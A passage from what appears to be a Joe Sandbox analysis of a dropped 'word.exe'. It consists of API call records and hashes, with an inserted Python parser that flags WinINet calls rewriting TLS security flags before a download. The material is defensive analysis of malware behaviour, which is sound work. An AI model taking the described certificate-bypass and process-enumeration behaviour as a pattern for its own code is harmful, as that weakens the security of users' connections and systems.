                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
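The WinINet record above (InternetConnectW, HttpOpenRequestW, InternetQueryOptionW and InternetSetOptionW with option 0x1F, HttpSendRequestW, HttpQueryInfoW with 0x5) has the shape of an HTTP download that reads and then rewrites the connection's security flags before the request goes out: 0x1F is INTERNET_OPTION_SECURITY_FLAGS and 0x5 is HTTP_QUERY_CONTENT_LENGTH. Which flag bits are written is in the 4-byte buffer passed to InternetSetOptionW, and that value is not visible in this report. The Python below is an added example, not Joe Sandbox output and not code from the analyzed word.exe: it parses API lines in the format these function records use, annotates the documented Win32 constants, and flags the query/set/send pattern so the analyst knows to inspect that buffer. The regular expression, the ApiCall dataclass, the constant table (which also carries the MapVirtualKeyW and VirtualFree values used by other records on this page) and the function names are this example's own; the sample input is copied from the record above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Copied from the function record above (Joe Sandbox "APIs" section of the
# dropped word.exe); this is the input the example runs on.
SAMPLE_RECORD = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
• InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
• HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix,
# "Api.MODULE", an optional "(args)" list, then ", ref: XXXXXXXX".
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

Arg = Union[int, str]  # 8-hex-digit arguments become ints; "?" and strings stay str

# Documented Win32 values keyed by (API, zero-based argument index). Only the
# ones needed for records on this page are listed; the table is this example's
# own, not part of the report.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
KNOWN_ARGS: Dict[tuple, Dict[int, str]] = {
    ("InternetQueryOptionW", 1): {INTERNET_OPTION_SECURITY_FLAGS: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("InternetSetOptionW", 1): {INTERNET_OPTION_SECURITY_FLAGS: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoW", 1): {0x05: "HTTP_QUERY_CONTENT_LENGTH"},
    ("MapVirtualKeyW", 0): {0x25: "VK_LEFT", 0x27: "VK_RIGHT"},
    ("VirtualFree", 2): {0x8000: "MEM_RELEASE"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: str                       # call-site address from "ref:"
    subcall: Optional[str] = None  # callee address when Joe attributes the call to a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line of a record; headers and non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_LINE.match(line)
        if not m:
            continue
        args: List[Arg] = []
        if m.group("args") is not None:
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else a)
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def describe(call: ApiCall) -> str:
    """Render a call with known constants annotated, e.g. 0x1F /*INTERNET_OPTION_SECURITY_FLAGS*/."""
    parts = []
    for i, a in enumerate(call.args):
        if isinstance(a, int):
            name = KNOWN_ARGS.get((call.api, i), {}).get(a)
            parts.append(f"0x{a:X}" + (f" /*{name}*/" if name else ""))
        else:
            parts.append(a)
    via = f" (via subcall {call.subcall})" if call.subcall else ""
    return f"{call.ref}: {call.api}({', '.join(parts)}){via}"


def find_security_flags_override(calls: List[ApiCall]) -> Optional[Dict[str, Optional[str]]]:
    """Flag InternetSetOptionW(INTERNET_OPTION_SECURITY_FLAGS) followed by HttpSendRequestW.

    The request is sent with rewritten TLS security flags. Which bits are set is in
    the 4-byte buffer argument, which the report does not show, so a hit is a prompt
    to inspect that buffer, not proof that certificate checks were disabled.
    """
    query_ref: Optional[str] = None
    set_ref: Optional[str] = None
    for c in calls:
        option = c.args[1] if len(c.args) > 1 else None
        if c.api == "InternetQueryOptionW" and option == INTERNET_OPTION_SECURITY_FLAGS:
            query_ref = c.ref
        elif c.api == "InternetSetOptionW" and option == INTERNET_OPTION_SECURITY_FLAGS:
            set_ref = c.ref
        elif c.api == "HttpSendRequestW" and set_ref is not None:
            return {"query_ref": query_ref, "set_ref": set_ref, "send_ref": c.ref}
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_RECORD)
    for call in parsed:
        print(describe(call))
    print(find_security_flags_override(parsed))
```

On the record above the finding points at 0044AAF9 (query), 0044AB11 (set) and 0044AB20 (send). To confirm what the sample actually does, break on InternetSetOptionW at 0044AB11 in a debugger and read the DWORD in the buffer argument; the SECURITY_FLAG_IGNORE_* bits, if present, are what would make the download tolerate an invalid server certificate.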
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastselect
                                                                            • String ID: HH
                                                                            • API String ID: 215497628-2761332787
                                                                            • Opcode ID: 38832bdf1c2d69764463c59b4ea3e323505be882b78fbcfb165a57a5b6e27ccc
                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                            • Opcode Fuzzy Hash: 38832bdf1c2d69764463c59b4ea3e323505be882b78fbcfb165a57a5b6e27ccc
                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                            • API String ID: 1729044348-3708979750
                                                                            • Opcode ID: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                            • Opcode Fuzzy Hash: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                            • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                            • String ID: X+
                                                                            • API String ID: 1976402638-1938338529
                                                                            • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                            • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                            • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                            • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0$X+
                                                                            • API String ID: 3866635326-479754480
                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                            • MoveFileW.KERNEL32 ref: 0044BC38
                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                            • _wcslen.LIBCMT ref: 0044BCCB
                                                                            • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2326526234-1173974218
                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                            APIs
                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                            • String ID: \
                                                                            • API String ID: 321622961-2967466578
                                                                            • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                            • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                            • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                            APIs
                                                                            • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                            • __wsplitpath.LIBCMT ref: 00436FA0
                                                                            • _wcscat.LIBCMT ref: 00436FB2
                                                                            • __wcsicoll.LIBCMT ref: 00436FC4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437003
                                                                            Similarity
                                                                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2903788889-0
                                                                            • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                            • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                            • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                            • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                            • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                            • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                            • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00401257
                                                                              • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                              • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                            • KillTimer.USER32 ref: 004012B0
                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1792922140-0
                                                                            • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                            • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 1925773019-0
                                                                            APIs
                                                                            • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                            • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                            • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                            • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                            • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                            • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                            • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                            • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                            • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                            • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                            • _memset.LIBCMT ref: 00464B92
                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                            • WSACleanup.WSOCK32 ref: 00464CE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                            • String ID:
                                                                            • API String ID: 3424476444-0
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID:
                                                                            • API String ID: 535477410-0
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00473C01
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID: HH
                                                                            • API String ID: 3488606520-2761332787
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 288456094-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
